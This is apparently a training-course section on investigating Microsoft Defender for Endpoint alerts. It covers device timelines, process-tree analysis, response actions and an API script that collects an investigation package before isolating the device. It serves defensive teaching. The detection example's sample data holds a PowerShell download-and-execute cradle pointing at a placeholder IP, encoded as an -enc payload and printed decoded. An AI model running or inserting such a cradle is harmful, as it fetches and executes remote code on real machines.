1.4 Manage Microsoft Defender for Endpoint Investigations
Domain 3 — Manage Incident Response: "Investigate device timelines," "Perform actions on the device, including live response and collecting investigation packages," and "Perform evidence and entity investigation."
Introduction
When malware reaches a device — or an attacker gains remote access to one — Defender for Endpoint is where you investigate. This subsection teaches you to read device timelines, interpret process trees, take response actions, and collect forensic evidence. Module 4 covers the full Defender for Endpoint configuration in depth. This subsection focuses on the investigation skills you use when an endpoint alert fires.
The device timeline
The device timeline is a chronological view of what the sensor recorded on a device: process creations, network connections, file writes, registry changes, logon events, and the alerts raised on them. It is the most detailed investigation data source for endpoint activity, and the same events can be queried at scale in Advanced Hunting (the DeviceProcessEvents, DeviceNetworkEvents, DeviceFileEvents, DeviceRegistryEvents and DeviceLogonEvents tables).
Reading a process tree: The most critical skill for endpoint investigation is reading parent-child process relationships. Legitimate software follows predictable patterns: explorer.exe → outlook.exe → winword.exe (user opens Outlook, opens Word attachment). Malicious behavior creates unusual chains: winword.exe → cmd.exe → powershell.exe → mimikatz.exe (macro launches command shell, downloads credential-dumping tool).
When investigating an endpoint alert:
- Open the device page from the incident → click the device entity
- Read the alert process tree — click the alert to see the specific process chain that triggered it
- Examine the parent process — is it a legitimate application launching a suspicious child?
- Check network connections — did the suspicious process connect to an external IP?
- Check file events — did the process drop files to disk?
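The parent-child reading above can be automated. The following is an added example, not code from the original course material or from Microsoft: it reconstructs process chains from DeviceProcessEvents-style records (ProcessId, InitiatingProcessId, FileName, ProcessCommandLine), flags any shell whose ancestry includes an Office application, and decodes a `-enc` payload, which powershell.exe expects as Base64 over UTF-16LE text. The events, PIDs, file names and the TEST-NET address in the payload are constructed for the example; the Office and shell name lists are assumptions to extend for your environment.

```python
import base64
import re

# Process names used to classify a chain. Constructed lists for this example;
# extend them to match your environment.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; match the common ones.
# Requiring whitespace after the flag keeps -ep (ExecutionPolicy) from matching.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")


def make_encoded(script: str) -> str:
    """Encode a script the way `powershell -enc` expects it: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -enc payload of a PowerShell command line, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not valid Base64, or not UTF-16LE text
        return None


# Constructed sample modelled on DeviceProcessEvents columns; not real telemetry.
# Real telemetry reuses PIDs, so key on ProcessId plus ProcessCreationTime there.
_PAYLOAD = make_encoded("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")
SAMPLE_EVENTS = [
    {"Timestamp": "09:12:40", "ProcessId": 4120, "InitiatingProcessId": 0,
     "FileName": "explorer.exe", "ProcessCommandLine": "explorer.exe"},
    {"Timestamp": "09:13:05", "ProcessId": 5210, "InitiatingProcessId": 4120,
     "FileName": "outlook.exe", "ProcessCommandLine": "OUTLOOK.EXE"},
    {"Timestamp": "09:13:40", "ProcessId": 5388, "InitiatingProcessId": 5210,
     "FileName": "winword.exe", "ProcessCommandLine": "WINWORD.EXE /n invoice.docm"},
    {"Timestamp": "09:14:01", "ProcessId": 6004, "InitiatingProcessId": 5388,
     "FileName": "cmd.exe", "ProcessCommandLine": "cmd.exe /c powershell -enc " + _PAYLOAD},
    {"Timestamp": "09:14:02", "ProcessId": 6120, "InitiatingProcessId": 6004,
     "FileName": "powershell.exe", "ProcessCommandLine": "powershell -enc " + _PAYLOAD},
    # Benign admin chain: same shells, but no Office ancestor, so it is not flagged.
    {"Timestamp": "09:20:00", "ProcessId": 7001, "InitiatingProcessId": 4120,
     "FileName": "cmd.exe", "ProcessCommandLine": "cmd.exe /c backup.cmd"},
    {"Timestamp": "09:20:01", "ProcessId": 7002, "InitiatingProcessId": 7001,
     "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell -ep bypass -File C:\\scripts\\backup.ps1"},
]


def ancestry(pid, by_pid, max_depth=32):
    """Walk InitiatingProcessId links and return the chain root -> ... -> pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)  # guards against loops caused by PID reuse
        event = by_pid[pid]
        chain.append(event["FileName"].lower())
        pid = event["InitiatingProcessId"]
    return list(reversed(chain))


def find_office_spawned_shells(events):
    """Flag every shell whose ancestry contains an Office application."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for event in sorted(events, key=lambda e: e["Timestamp"]):
        if event["FileName"].lower() not in SHELLS:
            continue
        chain = ancestry(event["ProcessId"], by_pid)
        if not any(name in OFFICE_APPS for name in chain[:-1]):
            continue
        findings.append({
            "Timestamp": event["Timestamp"],
            "ProcessId": event["ProcessId"],
            "Chain": " -> ".join(chain),
            "DecodedCommand": decode_encoded_command(event["ProcessCommandLine"]),
        })
    return findings


if __name__ == "__main__":
    for f in find_office_spawned_shells(SAMPLE_EVENTS):
        print(f"{f['Timestamp']} pid {f['ProcessId']}: {f['Chain']}")
        if f["DecodedCommand"]:
            print("    decoded -enc:", f["DecodedCommand"])
```

Run as a script it prints the two flagged processes (cmd.exe and its powershell.exe child) with the full chain back to explorer.exe and the decoded download cradle, and stays silent on the administrator's backup script. The same ancestry walk is what the portal draws as the alert process tree; doing it by hand against exported events is useful when the chain is deeper than the tree view shows.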
| Timestamp | Grandparent | Parent | Child | CommandLine |
|---|---|---|---|---|
| 09:14 | winword.exe | cmd.exe | powershell.exe | powershell -enc aQBl... |
The -enc flag takes a Base64-encoded command; the attacker is hiding the payload. PowerShell expects that Base64 to wrap UTF-16LE text, so decode it as UTF-16LE, not ASCII, to read what the script actually does. Word has no legitimate reason to launch a command shell, so this chain is caught by the ASR rule that blocks Office applications from creating child processes (Module 4.3) when the rule runs in block mode; in audit mode it is only logged. Treat the chain as a confirmed compromise: collect an investigation package, then isolate the device.
Response actions from the device page
| Action | What it does | When to use |
|---|---|---|
| Isolate device | Cuts the device's network access while keeping the Defender for Endpoint management channel; Full isolation blocks everything else, Selective isolation also leaves Outlook, Teams and Skype for Business reachable | Confirmed compromise: stops lateral movement and C2 |
| Collect investigation package | Gathers running processes, network connections, scheduled tasks, services, autorun entries, prefetch files, users and groups, and the Security event log into a downloadable archive | Before isolation: captures live state |
| Run antivirus scan | Full or quick Microsoft Defender Antivirus scan | Initial triage or post-remediation verification |
| Restrict app execution | Applies a code-integrity policy so only executables signed by a Microsoft-issued certificate can run | Active malware: prevents attacker tool execution |
| Live response | Remote shell with a fixed command set (for example processes, connections, getfile, and run for library scripts) | Forensic evidence collection, targeted file retrieval |
Isolation drops every active network connection except the management channel, and the investigation package captures exactly that kind of live state: current connections, running processes, logged-on users. Collect the package first, then isolate. Kicking off the collection takes only seconds, and the device stays reachable for live response and further collection while isolated, but the picture of what was connected at the moment of the alert is gone once isolation closes those sockets. This sequence is detailed in Module 4.6.
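The collect-then-isolate sequence can be scripted against the Defender for Endpoint API rather than clicked. The block below is an added example, not code from the course or from Microsoft. The endpoints it calls (POST /machines/{id}/collectInvestigationPackage, POST /machines/{id}/isolate with an IsolationType, GET /machineactions/{id}, and the Pending/InProgress/Succeeded/Failed/TimeOut/Cancelled statuses) are from Microsoft's published API reference; the request wrapper, the polling logic, the FakeService stand-in that lets it run offline, and the machine ID and comment strings are my own assumptions. Obtaining the bearer token from an app registration is out of scope here.

```python
import json
import time
import urllib.request

# Documented Defender for Endpoint API base and the terminal machine-action states.
API = "https://api.securitycenter.microsoft.com/api"
TERMINAL = {"Succeeded", "Failed", "TimeOut", "Cancelled"}


def http_transport(token):
    """Real transport: send(method, path, body) -> parsed JSON, using a bearer token."""
    def send(method, path, body=None):
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(API + path, data=data, method=method, headers={
            "Authorization": f"Bearer {token}", "Content-Type": "application/json"})
        with urllib.request.urlopen(req) as resp:
            return json.load(resp)
    return send


def wait_for_action(send, action_id, timeout=600, interval=15, sleep=time.sleep):
    """Poll GET /machineactions/{id} until it reaches a terminal status or we give up."""
    deadline = time.monotonic() + timeout
    while True:
        status = send("GET", f"/machineactions/{action_id}")["status"]
        if status in TERMINAL:
            return status
        if time.monotonic() >= deadline:
            return "PollTimeout"  # local give-up, distinct from the service's own TimeOut
        sleep(interval)


def contain_device(send, machine_id, comment, isolation="Full", sleep=time.sleep):
    """Collect the investigation package, wait for it, then isolate.

    Isolation is requested even if the collection fails: a failed collection must
    not leave a compromised device on the network. Returns [(action, status), ...].
    """
    steps = []
    pkg = send("POST", f"/machines/{machine_id}/collectInvestigationPackage",
               {"Comment": comment})
    steps.append(("collectInvestigationPackage", wait_for_action(send, pkg["id"], sleep=sleep)))
    iso = send("POST", f"/machines/{machine_id}/isolate",
               {"Comment": comment, "IsolationType": isolation})
    steps.append(("isolate", wait_for_action(send, iso["id"], sleep=sleep)))
    return steps


class FakeService:
    """Constructed stand-in for the API so the example runs offline: each action
    reports InProgress for `latency` polls and then Succeeded."""

    def __init__(self, latency=2):
        self.latency, self.calls, self.actions = latency, [], {}

    def send(self, method, path, body=None):
        self.calls.append((method, path, body))
        if method == "POST":
            action_id = f"act-{len(self.actions) + 1}"
            self.actions[action_id] = self.latency
            return {"id": action_id, "status": "Pending"}
        action_id = path.rsplit("/", 1)[1]
        self.actions[action_id] -= 1
        done = self.actions[action_id] <= 0
        return {"id": action_id, "status": "Succeeded" if done else "InProgress"}


if __name__ == "__main__":
    svc = FakeService()
    steps = contain_device(svc.send, "0123abcd", "IR-42: Word -> cmd -> powershell -enc",
                           sleep=lambda _: None)
    for action, status in steps:
        print(f"{action}: {status}")
    # Against the real service: contain_device(http_transport(token), machine_id, comment)
```

The order of the two POSTs is the whole point: the package request is submitted and polled to completion before the isolate request goes out, and the comment string lands on both machine actions so the audit trail in the Action center ties them to the same incident.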
Check your understanding
1. The device timeline shows: winword.exe → cmd.exe → powershell.exe -enc [base64]. What does this indicate and what is your response?